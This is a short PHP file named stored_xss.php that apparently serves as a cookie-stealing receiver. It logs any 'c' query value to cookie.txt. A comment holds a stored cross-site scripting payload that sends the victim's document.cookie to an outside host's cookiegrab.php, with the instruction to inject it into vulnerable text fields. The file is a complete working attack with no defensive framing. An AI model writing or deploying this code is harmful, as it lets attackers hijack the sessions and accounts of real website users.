stored_xss.php

1.  
2. <?php
3.  
4.     $cookie = $_GET["c"];
5.     $file = fopen('cookie.txt', 'a');
6.     fwrite($file, $cookie . "\n\n");
7.     /*
8.     inject
9.     <script language="javascript"> document.location= " http://kennethzhang.net/cookiegrab.php?c=" + document.cookie; </script>
10.     into vulnerable text fields
11.     */
12. ?>